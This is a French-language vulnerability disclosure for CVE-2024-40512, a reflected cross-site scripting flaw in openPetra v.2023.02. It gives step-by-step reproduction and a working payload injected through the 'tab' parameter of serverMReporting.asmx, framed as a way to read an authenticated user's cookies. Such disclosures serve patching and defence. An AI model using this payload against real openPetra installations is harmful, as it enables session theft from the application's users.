
OpenPetra v.2023.02 CVE-2024-40512
Description : Un utilisateur non authentifié peut voler les cookies d'un utilisateur authentifié en exploitant une XSS dans openPetra v.2023.02 via la fonction serverMReporting.asmx.
Version du produit vulnérable : openPetra v.2023.02
Auteur du CVE : Jansen Moreira
Date : 13/07/2024
CVE : CVE-2024-40512
Lien CVE : https://www.cve.org/CVERecord?id=CVE-2024-40512
Lien NVD : https://nvd.nist.gov/vuln/detail/CVE-2024-40512
Lien Tenable : https://www.tenable.com/cve/CVE-2024-40512
Confirmé le : 13/07/2024
Testé sur : Linux
1- Accéder à la page d'accueil
2- Utiliser le chemin suivant et ajouter le payload XSS dans le paramètre tab. Ex. : http://target.com/api/serverMReporting.asmx?bnd=TMReportingWebServiceSoap&op=TReportGeneratorWebConnector_GetProgress&page=op&tab=x" onmouseover=alert(document.cookie) x="
3- Survolez l'élément de l'index de gauche avec la souris pour déclencher la XSS
Payloads :
tab: x" onmouseover=alert(document.cookie) x="
Découvreur(s)/Crédits : Jansen Moreira